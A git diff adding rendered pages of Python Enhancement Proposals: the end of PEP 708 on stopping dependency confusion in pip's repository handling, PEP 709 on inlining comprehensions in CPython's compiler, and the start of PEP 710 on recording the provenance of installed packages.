+      "filename": "holygrail-1.0-py3-none-any.whl",
+      "url": "https://example.com/files/holygrail-1.0-py3-none-any.whl",
+      "hashes": {"sha256": "...", "blake2b": "..."},
+      "requires-python": ">=3.7",
+      "dist-info-metadata": true
+    }
+  ]
+}
+
+
+
+
+

HTML

+
<!DOCTYPE html>
+<html>
+  <head>
+    <meta name="pypi:repository-version" content="1.2">
+    <meta name="pypi:alternate-locations" content="https://pypi.org/simple/holygrail/">
+    <meta name="pypi:alternate-locations" content="https://test.pypi.org/simple/holygrail/">
+  </head>
+  <body>
+    <a href="https://example.com/files/holygrail-1.0.tar.gz#sha256=...">
+    <a href="https://example.com/files/holygrail-1.0-py3-none-any.whl#sha256=...">
+  </body>
+</html>
+
+
+
+
+
+
+

Recommendations

+

This section is non-normative; it provides recommendations to installers in how +to interpret this metadata that this PEP feels provides the best tradeoff +between protecting users by default and minimizing breakages to existing +workflows. These recommendations are not binding, and installers are free to +ignore them, or apply them selectively as they make sense in their specific +situations.

+
+

File Discovery Algorithm

+
+

Note

+

This algorithm is written based on how pip currently discovers files; +other installers may adapt this based on their own discovery procedures.

+
+

Currently the “standard” file discovery algorithm looks something like this:

+
    +
  1. Generate a list of all files across all configured repositories.
  2. +
  3. Filter out any files that do not match known hashes from a lockfile or +requirements file.
  4. +
  5. Filter out any files that do not match the current platform, Python version, +etc.
  6. +
  7. Pass that list of files into the resolver where it will attempt to resolve +the “best” match out of those files, irrespective of which repository it came +from.
  8. +
+

It is recommended that installers change their file discovery algorithm to take +into account the new metadata, and instead do:

+
    +
  1. Generate a list of all files across all configured repositories.
  2. +
  3. Filter out any files that do not match known hashes from a lockfile or +requirements file.
  4. +
  5. If the end user has explicitly told the installer to fetch the project from +specific repositories, filter out all other repositories and skip to 5.
  6. +
  7. Look to see if the discovered files span multiple repositories; if they do +then determine if either “Tracks” or “Alternate Locations” metadata allows +safely merging ALL of the repositories where files were discovered +together. If that metadata does NOT allow that, then generate an error, +otherwise continue.
      +
    • Note: This only applies to remote repositories; repositories that +exist on the local filesystem SHOULD always be implicitly allowed to be +merged to any remote repository.
    • +
    +
  8. +
  9. Filter out any files that do not match the current platform, Python version, +etc.
  10. +
  11. Pass that list of files into the resolver where it will attempt to resolve +the “best” match out of those files, irrespective of what repository it came +from.
  12. +
+

This is somewhat subtle, but the key things in the recommendation are:

+
    +
  • Users who are using lock files or requirements files that include specific +hashes of artifacts that are “valid” are assumed to be protected by nature of +those hashes, since the rest of these recommendations would apply during +hash generation. Thus, we filter out unknown hashes up front.
  • +
  • If the user has explicitly told the installer that it wants to fetch a project +from a certain set of repositories, then there is no reason to question that +and we assume that they’ve made sure it is safe to merge those namespaces.
  • +
  • If the project in question only comes from a single repository, then there is +no chance of dependency confusion, so there’s no reason to do anything but +allow.
  • +
  • We check for the metadata in this PEP before filtering out based on platform, +Python version, etc., because we don’t want errors that only show up on +certain platforms, Python versions, etc.
  • +
  • If nothing tells us merging the namespaces is safe, we refuse to implicitly +assume it is, and generate an error instead.
  • +
  • Otherwise we merge the namespaces, and continue on.
  • +
+

This algorithm ensures that an installer never assumes that two disparate +namespaces can be flattened into one, which for all practical purposes +eliminates the possibility of any kind of dependency confusion attack, while +still giving power throughout the stack in a safe way to allow people to +explicitly declare when those disparate namespaces are actually one logical +namespace that can be safely merged.

+

The above algorithm is mostly a conceptual model. In reality the algorithm may +end up being slightly different in order to be more privacy preserving and +faster, or even just adapted to fit a specific installer better.

+
+
+

Explicit Configuration for End Users

+

This PEP avoids dictating or recommending a specific mechanism by which an +installer allows an end user to configure exactly what repositories they want a +specific package to be installed from. However, it does recommend that +installers do provide some mechanism for end users to provide that +configuration, as without it users can end up in a DoS situation in cases +like torchtriton where they’re just completely broken unless they resolve +the namespace collision externally (get the name taken down on one repository, +stand up a personal repository that handles the merging, etc).

+

This configuration also allows end users to pre-emptively secure themselves +during what is likely to be a long transition until the default behavior is +safe.

+
+
+
+

How to Communicate This

+
+

Note

+

This example is pip specific and assumes specifics about how pip will +choose to implement this PEP; it’s included as an example of how we can +communicate this change, and not intended to constrain pip or any other +installer in how they implement this. This may ultimately be the actual basis +for communication, and if so will need be edited for accuracy and clarity.

+

This section should be read as if it were an entire “post” to communicate this +change that could be used for a blog post, email, or discourse post.

+
+

There’s a long-standing class of attacks that are called “dependency confusion” +attacks, which roughly boil down to an individual expected to get package A, +but instead they got B. In Python, this almost always happens due to the end +user having configured multiple repositories, where they expect package A to +come from repository X, but someone is able to publish package B with +the same name as package A in repository Y.

+

There are a number of ways to mitigate against these attacks today, but they all +require that the end user explicitly go out of their way to protect themselves, +rather than it being inherently safe.

+

In an effort to secure pip’s users and protect them from these types of attacks, +we will be changing how pip discovers packages to install.

+
+

What is Changing?

+

When pip discovers that the same project is available from multiple remote +repositories, by default it will generate an error and refuse to proceed rather +than make a guess about which repository was the correct one to install from.

+

Projects that natively publish to multiple repositories will be given the +ability to safely “link” their repositories together so that pip does not error +when those repositories are used together.

+

End users of pip will be given the ability to explicitly define one or more +repositories that are valid for a specific project, causing pip to only consider +those repositories for that project, and avoiding generating an error +altogether.

+

See TBD for more information.

+
+
+

Who is Affected?

+

Users who are installing from multiple remote (e.g. not present on the local +filesystem) repositories may be affected by having pip error instead of +successfully install if:

+
    +
  • They install a project where the same “name” is being served by multiple +remote repositories.
  • +
  • The project name that is available from multiple remote repositories has not +used one of the defined mechanisms to link those repositories together.
  • +
  • The user invoking pip has not used the defined mechanism to explicitly control +what repositories are valid for a particular project.
  • +
+

Users who are not using multiple remote repositories will not be affected at +all, which includes users who are only using a single remote repository, plus a +local filesystem “wheel house”.

+
+
+

What do I need to do?

+
+

As a pip User?

+

If you’re using only a single remote repository you do not have to do anything.

+

If you’re using multiple remote repositories, you can opt into the new behavior +by adding --use-feature=TBD to your pip invocation to see if any of your +dependencies are being served from multiple remote repositories. If they are, +you should audit them to determine why they are, and what the best remediation +step will be for you.

+

Once this behavior becomes the default, you can opt out of it temporarily by +adding --use-deprecated=TBD to your pip invocation.

+

If you’re using projects that are not hosted on a public repository, but you +still have the public repository as a fallback, consider configuring pip with a +repository file to be explicit where that dependency is meant to come from to +prevent registration of that name in a public repository to cause pip to error +for you.

+
+
+

As a Project Owner?

+

If you only publish your project to a single repository, then you do not have to +do anything.

+

If you publish your project to multiple repositories that are intended to be +used together at the same time, configure all repositories to serve the +alternate repository metadata to prevent breakages for your end users.

+

If you publish your project to a single repository, but it is commonly used in +conjunction with other repositories, consider preemptively registering your +names with those repositories to prevent a third party from being able to cause +your users pip install invocations to start failing. This may not be +available if your project name is too generic or if the repositories have +policies that prevent defensive name squatting.

+
+
+

As a Repository Operator?

+

You’ll need to decide how you intend for your repository to be used by your end +users and how you want them to use it.

+

For private repositories that host private projects, it is recommended that you +mirror the public projects that your users depend on into your own repository, +taking care not to let a public project merge with a private project, and tell +your users to use the --index-url option to use only your repository.

+

For public repositories that host public projects, you should implement the +alternate repository mechanism and enable the owners of those projects to +configure the list of repositories that their project is available from if they +make it available from more than one repository.

+

For public repositories that “track” another repository, but provide +supplemental artifacts such as wheels built for a specific platform, you should +implement the “tracks” metadata for your repository. However, this information +MUST NOT be settable by end users who are publishing projects to your +repository. See TBD for more information.

+
+
+
+
+

Rejected Ideas

+

Note: Some of these are somewhat specific to pip, but any solution that doesn’t +work for pip isn’t a particularly useful solution.

+
+

Implicitly allow mirrors when the list of files are the same

+

If every repository returns the exact same list of files, then it is safe to +consider those repositories to be the same namespace and implicitly merge them. +This would possibly mean that mirrors would be automatically allowed without any +work on any user or repository operator’s part.

+

Unfortunately, this has two failings that make it undesirable:

+
    +
  • It only solves the case of mirrors that are exact copies of each other, but +not repositories that “track” another one, which ends up being a more generic +solution.
  • +
  • Even in the case of exact mirrors, multiple repositories mirroring each other +is a distributed system will not always be fully consistent with each +other, effectively an eventually consistent system. This means that +repositories that relied on this implicit heuristic to work would have +sporadic failures due to drift between the source repository and the mirror +repositories.
  • +
+
+
+

Provide a mechanism to order the repositories

+

Providing some mechanism to give the repositories an order, and then short +circuiting the discovery algorithm when it finds the first repository that +provides files for that project is another workable solution that is safe if the +order is specified correctly.

+

However, this has been rejected for a number of reasons:

+
    +
  • We’ve spent 15+ years educating users that the ordering of repositories being +specified is not meaningful, and they effectively have an undefined order. It +would be difficult to backpedal on that and start saying that now order +matters.
  • +
  • Users can easily rearrange the order that they specify their repositories in +within a single location, but when loading repositories from multiple +locations (env var, conf file, requirements file, cli arguments) the order is +hard coded into pip. While it would be a deterministic and documented order, +there’s no reason to assume it’s the order that the user wants their +repositories to be defined in, forcing them to contort how they configure pip +so that the implicit ordering ends up being the correct one.
  • +
  • The above can be mitigated by providing a way to explicitly declare the order +rather than by implicitly using the order they were defined in; however, that +then means that the protections are not provided unless the user does some +explicit configuration.
  • +
  • Ordering assumes that one repository is always preferred over another +repository without any way to decide on a project by project basis.
  • +
  • Relying on ordering is subtle; if I look at an ordering of repositories, I +have no way of knowing or ensuring in advance what names are going +to come from what repositories. I can only know in that moment what names are +provided by which repositories.
  • +
  • Relying on ordering is fragile. There’s no reason to assume that two disparate +repositories are not going to have random naming collisions—what happens if +I’m using a library from a lower priority repository and then a higher +priority repository happens to start having a colliding name?
  • +
  • In cases where ordering does the wrong thing, it does so silently, with no +feedback given to the user. This is by design because it doesn’t actually know +what the wrong or right thing is, it’s just hoping that order will give the +right thing, and if it does then users are protected without any breakage. +However, when it does the wrong thing, users are left with a very confusing +behavior coming from pip, where it’s just silently installing the wrong thing.
  • +
+

There is a variant of this idea which effectively says that it’s really just +PyPI’s nature of open registration that causes the real problems, so if we treat +all repositories but the “default” one as equal priority, and then treat the +default one as a lower priority then we’ll fix things.

+

That is true in that it does improve things, but it has many of the same +problems as the general ordering idea (though not all of them).

+

It also assumes that PyPI, or whatever repository is configured as the +“default”, is the only repository with open registration of names. +However, projects like Piwheels exist +which users are expected to use in addition to PyPI, +which also effectively have open registration of names +since it tracks whatever names are registered on PyPI.

+
+
+

Rely on repository proxies

+

One possible solution is to instead of having the installer have to solve this, +to instead depend on repository proxies that can intelligently merge multiple +repositories safely. This could provide a better experience for people with +complex needs because they can have configuration and features that are +dedicated to the problem space.

+

However, that has been rejected because:

+
    +
  • It requires users to opt into using them, unless we also remove the facilities +to have more than one repository in installers to force users into using a +repository proxy when they need multiple repositories.
      +
    • Removing facilities to have more than one repository configured has been +rejected because it would be too disruptive to end users.
    • +
    +
  • +
  • A user may need different outcomes of merging multiple repositories in +different contexts, or may need to merge different, mutually exclusive +repositories. This means they’ll need to actually set up multiple repository +proxies for each unique set of options.
  • +
  • It requires users to maintain infrastructure or it requires adding features in +installers to automatically spin up a repository for each invocation.
  • +
  • It doesn’t actually change the requirement to need to have a solution to these +problems, it just shifts the responsibility of implementation from installers +to some repository proxy, but in either case we still need something that +figures out how to merge these disparate namespaces.
  • +
  • Ultimately, most users do not want to have to stand up a repository proxy just +to safely interact with multiple repositories.
  • +
+
+
+

Rely only on hash checking

+

Another possible solution is to rely on hash checking, since with hash checking +enabled users cannot get an artifact that they didn’t expect; it doesn’t matter +if the namespaces are incorrectly merged or not.

+

This is certainly a solution; unfortunately it also suffers from problems that +make it unworkable:

+
    +
  • It requires users to opt in to it, so users are still unprotected by default.
  • +
  • It requires users to do a bunch of labor to manage their hashes, which is +something that most users are unlikely to be willing to do.
  • +
  • It is difficult and verbose to get the protection when users are not using a +requirements.txt file as the source of their dependencies (this affects +build time dependencies, and dependencies provided at the command line).
  • +
  • It only sort of solves the problem, in a way it just shifts the responsibility +of the problem to be whatever system is generating the hashes that the +installer would use. If that system isn’t a human manually validating hashes, +which it’s unlikely it would be, then we’ve just shifted the question of how +to merge these namespaces to whatever tool implements the maintenance of the +hashes.
  • +
+
+
+

Require all projects to exist in the “default” repository

+

Another idea is that we can narrow the scope of --extra-index-url such that +its only supported use is to refer to supplemental repositories to the default +repository, effectively saying that the default repository defines the +namespace, and every additional repository just extends it with extra packages.

+

The implementation of this would roughly be to require that the project MUST +be registered with the default repository in order for any additional +repositories to work.

+

This sort of works if you successfully narrow the scope in that way, but +ultimately it has been rejected because:

+
    +
  • Users are unlikely to understand or accept this reduced scope, and thus are +likely to attempt to continue to use it in the now unsupported fashion.
      +
    • This is complicated by the fact that with the scope now narrowed, users who +have the excluded workflow no longer have any alternative besides setting up +a repository proxy, which takes infrastructure and effort that they +previously didn’t have to do.
    • +
    +
  • +
  • It assumes that just because a name in an “extra” repository is the same as in +the default repository, that they are the same project. If we were starting +from scratch in a brand new ecosystem then maybe we could make this assumption +from the start and make it stick, but it’s going to be incredibly difficult to +get the ecosystem to adjust to that change.
      +
    • This is a fundamental issue with this approach; the underlying problem that +drives dependency confusion is that we’re taking disparate namespaces and +flattening them into one. This approach essentially just declares that OK, +and attempts to mitigate it by requiring everyone to register their names.
    • +
    +
  • +
  • Because of the above assumption, in cases where a name in an extra repository +collides by accident with the default repository, it’s going to appear to work +for those users, but they are going to be silently in a state of dependency +confusion.
      +
    • This is made worse by the fact that the person who owns the name that is +allowing this to work is going to be completely unaware of the role that +they’re playing for that user, and might possibly delete their project or +hand it off to someone else, potentially allowing them to inadvertently +allow a malicious user to take it over.
    • +
    +
  • +
  • Users are likely to attempt to get back to a working state by registering +their names in their default repository as a defensive name squat. Their +ability to do this will depend on the specific policies of their default +repository, whether someone already has that name, whether it’s too generic, +etc. As a best case scenario it will cause needless placeholder projects that +serve no purpose other than to secure some internal use of a name.
  • +
+
+
+

Move to Globally Unique Names

+

The main reason this problem exists is that we don’t have globally unique names, +we have locally unique names that exist under multiple namespaces that we are +attempting to merge into a single flat namespace. If we could instead come up +with a way to have globally unique names, we could sidestep the entire issue.

+

This idea has been rejected because:

+
    +
  • Generating globally unique but secure names that are also meaningful to humans +is a nearly impossible feat without piggybacking off of some kind of +centralized database. To my knowledge the only systems that have managed to do +this end up piggybacking off of the domain system and refer to packages by +URLs with domains etc.
  • +
  • Even if we come up with a mechanism to get globally unique names, our ability +to retrofit that into our decades old system is practically zero without +burning it all to the ground and starting over. The best we could probably do +is declare that all non globally unique names are implicitly names on the PyPI +domain name, and force everyone with a non PyPI package to rename their +package.
  • +
  • This would upend so many core assumptions and fundamental parts of our current +system it’s hard to even know where to start to list them.
  • +
+
+
+

Only recommend that installers offer explicit configuration

+

One idea that has come up is to essentially just implement the explicit +configuration and don’t make any other changes to anything else. The specific +proposal for a mapping policy is what actually inspired the explicit +configuration option, and created a file that looked something like:

+
{
+  "repositories": {
+    "PyTorch": ["https://download.pytorch.org/whl/nightly"],
+    "PyPI": ["https://pypi.org/simple"]
+  },
+  "mapping": [
+    {
+      "paths": ["torch*"],
+      "repositories": ["PyTorch"],
+      "terminating": true
+    },
+    {
+      "paths": ["*"],
+      "repositories": ["PyPI"]
+    }
+  ]
+}
+
+
+

The recommendation to have explicit configuration pushes the decision on how to +implement that onto each installer, allowing them to choose what works best for +their users.

+

Ultimately only implementing some kind of explicit configuration was rejected +because by its nature it’s opt in, so it doesn’t protect average users who are +least capable to solve the problem with the existing tools; by adding additional +protections alongside the explicit configuration, we are able to protect all +users by default.

+

Additionally, relying on only explicit configuration also means that every end +user has to resolve the same problem over and over again, even in cases like +mirrors of PyPI, Piwheels, PyTorch, etc. In each and every case they have to sit +there and make decisions (or find some example to cargo cult) in order to be +secure. Adding extra features into the mix allows us to centralize those +protections where we can, while still giving advanced end users the ability to +completely control their own destiny.

+
+
+

Scopes à la npm

+

There’s been some suggestion that +scopes similar to how npm has implemented them +may ultimately solve this. Ultimately scopes do not change anything about this +problem. As far as I know scopes in npm are not globally unique, they’re tied to +a specific registry just like unscoped names are. However what scopes do enable +is an obvious mechanism for grouping related projects and the ability for a user +or organization on npm.org to claim an entire scope, which makes explicit +configuration significantly easier to handle because you can be assured that +there’s a whole little slice of the namespace that wholly belongs to you, and +you can easily write a rule that assigns an entire scope to a specific non +public registry.

+

Unfortunately, it basically ends up being an easier version of the idea to only +use explicit configuration, which works ok in npm because its not particularly +common for people to use their own registries, but in Python we encourage you to +do just that.

+
+
+

Define and Standardize the “Explicit Configuration”

+

This PEP recommends installers to have a mechanism for explicit configuration of +which repository a particular project comes from, but it does not define what +that mechanism is. We are purposefully leave that undefined, as it is closely +tied to the UX of each individual installer and we want to allow each individual +installer the ability to expose that configuration in whatever way that they see +fit for their particular use cases.

+

Further, when the idea of defining that mechanism came up, none of the other +installers seemed particularly interested in having that mechanism defined for +them, suggesting that they were happy to treat that as part of their UX.

+

Finally, that mechanism, if we did choose to define it, deserves it’s own PEP +rather than baking it as part of the changes to the repository API in this PEP +and it can be a future PEP if we ultimately decide we do want to go down the +path of standardization for it.

+
+
+
+

Acknowledgements

+

Thanks to Trishank Kuppusamy for kick starting the discussion that lead to this +PEP with his proposal.

+

Thanks to Paul Moore, Pradyun Gedam, Steve Dower, and Trishank Kuppusamy for +providing early feedback and discussion on the ideas in this PEP.

+

Thanks to Jelle Zijlstra, C.A.M. Gerlach, Hugo van Kemenade, and Stefano Rivera +for copy editing and improving the structure and quality of this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0708.rst

+

Last modified: 2024-08-17 01:15:14 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0709/index.html b/pep-0709/index.html new file mode 100644 index 00000000000..7b68819fcb0 --- /dev/null +++ b/pep-0709/index.html @@ -0,0 +1,436 @@ + + + + + + + + PEP 709 – Inlined comprehensions | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 709 – Inlined comprehensions

+
+
Author:
+
Carl Meyer <carl at oddbird.net>
+
Sponsor:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
24-Feb-2023
+
Python-Version:
+
3.12
+
Post-History:
+
25-Feb-2023
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

Comprehensions are currently compiled as nested functions, which provides +isolation of the comprehension’s iteration variable, but is inefficient at +runtime. This PEP proposes to inline list, dictionary, and set comprehensions +into the code where they are defined, and provide the expected isolation by +pushing/popping clashing locals on the stack. This change makes comprehensions +much faster: up to 2x faster for a microbenchmark of a comprehension alone, +translating to an 11% speedup for one sample benchmark derived from real-world +code that makes heavy use of comprehensions in the context of doing actual work.

+
+
+

Motivation

+

Comprehensions are a popular and widely-used feature of the Python language. +The nested-function compilation of comprehensions optimizes for compiler +simplicity at the expense of performance of user code. It is possible to +provide near-identical semantics (see Backwards Compatibility) with much +better runtime performance for all users of comprehensions, with only a small +increase in compiler complexity.

+
+
+

Rationale

+

Inlining is a common compiler optimization in many languages. Generalized +inlining of function calls at compile time in Python is near-impossible, since +call targets may be patched at runtime. Comprehensions are a special case, +where we have a call target known statically in the compiler that can neither +be patched (barring undocumented and unsupported fiddling with bytecode +directly) nor escape.

+

Inlining also permits other compiler optimizations of bytecode to be more +effective, because they can now “see through” the comprehension bytecode, +instead of it being an opaque call.

+

Normally a performance improvement would not require a PEP. In this case, the +simplest and most efficient implementation results in some user-visible effects, +so this is not just a performance improvement, it is a (small) change to the +language.

+
+
+

Specification

+

Given a simple comprehension:

+
def f(lst):
+    return [x for x in lst]
+
+
+

The compiler currently emits the following bytecode for the function f:

+
1           0 RESUME                   0
+
+2           2 LOAD_CONST               1 (<code object <listcomp> at 0x...)
+            4 MAKE_FUNCTION            0
+            6 LOAD_FAST                0 (lst)
+            8 GET_ITER
+           10 CALL                     0
+           20 RETURN_VALUE
+
+Disassembly of <code object <listcomp> at 0x...>:
+2           0 RESUME                   0
+            2 BUILD_LIST               0
+            4 LOAD_FAST                0 (.0)
+      >>    6 FOR_ITER                 4 (to 18)
+           10 STORE_FAST               1 (x)
+           12 LOAD_FAST                1 (x)
+           14 LIST_APPEND              2
+           16 JUMP_BACKWARD            6 (to 6)
+      >>   18 END_FOR
+           20 RETURN_VALUE
+
+
+

The bytecode for the comprehension is in a separate code object. Each time +f() is called, a new single-use function object is allocated (by +MAKE_FUNCTION), called (allocating and then destroying a new frame on the +Python stack), and then immediately thrown away.

+

Under this PEP, the compiler will emit the following bytecode for f() +instead:

+
1           0 RESUME                   0
+
+2           2 LOAD_FAST                0 (lst)
+            4 GET_ITER
+            6 LOAD_FAST_AND_CLEAR      1 (x)
+            8 SWAP                     2
+           10 BUILD_LIST               0
+           12 SWAP                     2
+      >>   14 FOR_ITER                 4 (to 26)
+           18 STORE_FAST               1 (x)
+           20 LOAD_FAST                1 (x)
+           22 LIST_APPEND              2
+           24 JUMP_BACKWARD            6 (to 14)
+      >>   26 END_FOR
+           28 SWAP                     2
+           30 STORE_FAST               1 (x)
+           32 RETURN_VALUE
+
+
+

There is no longer a separate code object, nor creation of a single-use function +object, nor any need to create and destroy a Python frame.

+

Isolation of the x iteration variable is achieved by the combination of the +new LOAD_FAST_AND_CLEAR opcode at offset 6, which saves any outer value +of x on the stack before running the comprehension, and 30 STORE_FAST, +which restores the outer value of x (if any) after running the +comprehension.

+

If the comprehension accesses variables from the outer scope, inlining avoids +the need to place these variables in a cell, allowing the comprehension (and all +other code in the outer function) to access them as normal fast locals instead. +This provides further performance gains.

+

In some cases, the comprehension iteration variable may be a global or cellvar +or freevar, rather than a simple function local, in the outer scope. In these +cases, the compiler also internally pushes and pops the scope information for +the variable when entering/leaving the comprehension, so that semantics are +maintained. For example, if the variable is a global outside the comprehension, +LOAD_GLOBAL will still be used where it is referenced outside the +comprehension, but LOAD_FAST / STORE_FAST will be used within the +comprehension. If it is a cellvar/freevar outside the comprehension, the +LOAD_FAST_AND_CLEAR / STORE_FAST used to save/restore it do not change +(there is no LOAD_DEREF_AND_CLEAR), meaning that the entire cell (not just +the value within it) is saved/restored, so the comprehension does not write to +the outer cell.

+

Comprehensions occurring in module or class scope are also inlined. In this +case, the comprehension will introduce usage of fast-locals (LOAD_FAST / +STORE_FAST) for the comprehension iteration variable within the +comprehension only, in a scope where otherwise only LOAD_NAME / +STORE_NAME would be used, maintaining isolation.

+

In effect, comprehensions introduce a sub-scope where local variables are fully +isolated, but without the performance cost or stack frame entry of a call.

+

Generator expressions are currently not inlined in the reference implementation +of this PEP. In the future, some generator expressions may be inlined, where the +returned generator object does not leak.

+

Asynchronous comprehensions are inlined the same as synchronous ones; no special +handling is needed.

+
+
+

Backwards Compatibility

+

Comprehension inlining will cause the following visible behavior changes. No +changes in the standard library or test suite were necessary to adapt to these +changes in the implementation, suggesting the impact in user code is likely to +be minimal.

+

Specialized tools depending on undocumented details of compiler bytecode output +may of course be affected in ways beyond the below, but these tools already must +adapt to bytecode changes in each Python version.

+
+

locals() includes outer variables

+

Calling locals() within a comprehension will include all locals of the +function containing the comprehension. E.g. given the following function:

+
def f(lst):
+    return [locals() for x in lst]
+
+
+

Calling f([1]) in current Python will return:

+
[{'.0': <list_iterator object at 0x7f8d37170460>, 'x': 1}]
+
+
+

where .0 is an internal implementation detail: the synthetic sole argument +to the comprehension “function”.

+

Under this PEP, it will instead return:

+
[{'lst': [1], 'x': 1}]
+
+
+

This now includes the outer lst variable as a local, and eliminates the +synthetic .0.

+
+
+

No comprehension frame in tracebacks

+

Under this PEP, a comprehension will no longer have its own dedicated frame in +a stack trace. For example, given this function:

+
def g():
+    raise RuntimeError("boom")
+
+def f():
+    return [g() for x in [1]]
+
+
+

Currently, calling f() results in the following traceback:

+
Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 5, in f
+  File "<stdin>", line 5, in <listcomp>
+  File "<stdin>", line 2, in g
+RuntimeError: boom
+
+
+

Note the dedicated frame for <listcomp>.

+

Under this PEP, the traceback looks like this instead:

+
Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+  File "<stdin>", line 5, in f
+  File "<stdin>", line 2, in g
+RuntimeError: boom
+
+
+

There is no longer an extra frame for the list comprehension. The frame for the +f function has the correct line number for the comprehension, however, so +this simply makes the traceback more compact without losing any useful +information.

+

It is theoretically possible that code using warnings with the stacklevel +argument could observe a behavior change due to the frame stack change. In +practice, however, this seems unlikely. It would require a warning raised in +library code that is always called through a comprehension in that same +library, where the warning is using a stacklevel of 3+ to bypass the +comprehension and its containing function and point to a calling frame outside +the library. In such a scenario it would usually be simpler and more reliable +to raise the warning closer to the calling code and bypass fewer frames.

+
+
+

Tracing/profiling will no longer show a call/return for the comprehension

+

Naturally, since list/dict/set comprehensions will no longer be implemented as a +call to a nested function, tracing/profiling using sys.settrace or +sys.setprofile will also no longer reflect that a call and return have +occurred.

+
+
+
+

Impact on other Python implementations

+

Per comments from representatives of GraalPython and +PyPy, +they would likely feel the need to adapt to the observable behavior changes +here, given the likelihood that someone, at some point, will depend on them. +Thus, all else equal, fewer observable changes would be less work. But these +changes (at least in the case of GraalPython) should be manageable “without much +headache”.

+
+
+

How to Teach This

+

It is not intuitively obvious that comprehension syntax will or should result +in creation and call of a nested function. For new users not already accustomed +to the prior behavior, I suspect the new behavior in this PEP will be more +intuitive and require less explanation. (“Why is there a <listcomp> line in +my traceback when I didn’t define any such function? What is this .0 +variable I see in locals()?”)

+
+
+

Security Implications

+

None known.

+
+
+

Reference Implementation

+

This PEP has a reference implementation in the form of a PR against the CPython main +branch which passes all tests.

+

The reference implementation performs the micro-benchmark ./python -m pyperf +timeit -s 'l = [1]' '[x for x in l]' 1.96x faster than the main branch (in a +build compiled with --enable-optimizations.)

+

The reference implementation performs the comprehensions benchmark in the +pyperformance benchmark suite +(which is not a micro-benchmark of comprehensions alone, but tests +real-world-derived code doing realistic work using comprehensions) 11% faster +than main branch (again in optimized builds). Other benchmarks in +pyperformance (none of which use comprehensions heavily) don’t show any impact +outside the noise.

+

The implementation has no impact on non-comprehension code.

+
+
+

Rejected Ideas

+
+

More efficient comprehension calling, without inlining

+

An alternate approach +introduces a new opcode for “calling” a comprehension in streamlined fashion +without the need to create a throwaway function object, but still creating a new +Python frame. This avoids all of the visible effects listed under Backwards +Compatibility, and provides roughly half of the performance benefit (1.5x +improvement on the microbenchmark, 4% improvement on comprehensions +benchmark in pyperformance.) It also requires adding a new pointer to the +_PyInterpreterFrame struct and a new Py_INCREF on each frame +construction, meaning (unlike this PEP) it has a (very small) performance cost +for all code. It also provides less scope for future optimizations.

+

This PEP takes the position that full inlining offers sufficient additional +performance to more than justify the behavior changes.

+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0709.rst

+

Last modified: 2023-12-15 15:06:12 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0710/index.html b/pep-0710/index.html new file mode 100644 index 00000000000..d9079bcc476 --- /dev/null +++ b/pep-0710/index.html @@ -0,0 +1,758 @@ + + + + + + + + PEP 710 – Recording the provenance of installed packages | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 710 – Recording the provenance of installed packages

+
+
Author:
+
Fridolín Pokorný <fridolin.pokorny at gmail.com>
+
Sponsor:
+
Donald Stufft <donald at stufft.io>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
27-Mar-2023
+
Post-History:
+
03-Dec-2021, +30-Jan-2023, +14-Mar-2023, +03-Apr-2023
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a way to record the provenance of installed Python distributions. +The record is created by an installer and is available to users in +the form of a JSON file provenance_url.json in the .dist-info directory. +The mentioned JSON file captures additional metadata to allow recording a URL to a +distribution package together with the installed distribution hash. +This proposal is built on top of PEP 610 following its corresponding +canonical PyPA spec and complements direct_url.json +with provenance_url.json for when packages are identified by a name, and +optionally a version.

+
+
+

Motivation

+

Installing a Python Project involves downloading a Distribution Package +from a Package Index +and extracting its content to an appropriate place. After the installation +process is done, information about the release artifact used as well as its source +is generally lost. However, there are use cases for keeping records of +distributions used for installing packages and their provenance.

+

Python wheels can be built with different compiler flags or supporting +different wheel tags. In both cases, users might get into a situation in which +multiple wheels might be considered by installers (possibly from different +package indexes) and immediately finding out which wheel file was actually used +during the installation might be helpful. This way, developers can use +information about wheels to debug issues making sure the desired wheel was +actually installed. Another use case could be tools reporting software +installed, such as tools reporting a SBOM (Software Bill of Materials), that might +give more accurate reports. Yet another use case could be reconstruction of the +Python environment by pinning each installed package to a specific distribution +artifact consumed from a Python package index.

+
+
+

Rationale

+

The motivation described in this PEP is an extension of Recording the +Direct URL Origin of installed distributions +specification. In addition to recording provenance information for packages +installed using a direct URL, installers should also do so for packages +installed by name (and optionally version) from Python package indexes.

+

The idea described in this PEP originated in a tool called micropipenv +that is used to install +distribution packages in containerized +environments (see the reported issue thoth-station/micropipenv#206). +Currently, the assembled containerized application does not implicitly carry +information about the provenance of installed distribution packages +(unless these are installed from full URLs and recorded via direct_url.json). +This requires container image suppliers to link +container images with the corresponding build process, its configuration and +the application source code for checking requirements files in cases when +software present in containerized environments needs to be audited.

+

The subsequent discussion in the Discourse thread also brought up +pip’s new --report option that can +generate a detailed JSON report about +the installation process. This option could help with the provenance problem +this PEP approaches. Nevertheless, this option needs to be explicitly passed +to pip to obtain the provenance information, and includes additional metadata that +might not be necessary for checking the provenance (such as Python version +requirements of each distribution package). Also, this option is +specific to pip as of the writing of this PEP.

+

